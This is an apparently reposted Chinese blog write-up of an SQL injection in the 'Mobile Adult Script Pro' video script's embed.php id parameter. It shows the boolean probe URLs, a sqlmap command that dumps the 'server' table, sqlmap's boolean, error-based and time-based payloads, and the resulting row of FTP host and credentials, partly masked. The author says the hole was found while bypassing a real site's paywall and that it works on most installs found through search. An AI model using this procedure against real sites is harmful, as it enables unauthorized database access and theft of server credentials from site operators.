来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码起因是因为国内某绅士网站观看学习视频需要积分,于是找到了...
|
通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码
起因是因为国内某绅士网站观看学习视频需要积分,于是找到了视频播放页面就可以绕过积分限制了,后来测试了一下1=2会报错,sqlmap跑下库妥妥儿的。后来用手机登录网站发现标题和电脑登录的标题不同,显示的是Mobile Adult Script Pro 这个一看就是通用程序嘛,谷歌一下到官网发现官网提供的demo里面可以重现漏洞。
http://www.adultscriptpro.com/demo.html
google一下标题会发现不少使用此套程序的,有的需要改一下路径,基本全都可以搞定。
http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1
 http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2
 python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2806 AND 6581=6581
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2806 AND SLEEP(5)
---
web application technology: PHP 5.4.26
back-end DBMS: MySQL 5.0
Database: ***
Table: server
[1 entry]
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| server_id | total_videos | url | status | ftp_port | ftp_root | ftp_host | last_used | server_name | rtmp_stream | lighttpd_url | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| 2 | 2974 | <blank> | 1 | 21 | / | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | *** | P4ss#w0rD | zx*****121 | /stream/ | apache | rtmp | 0 |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
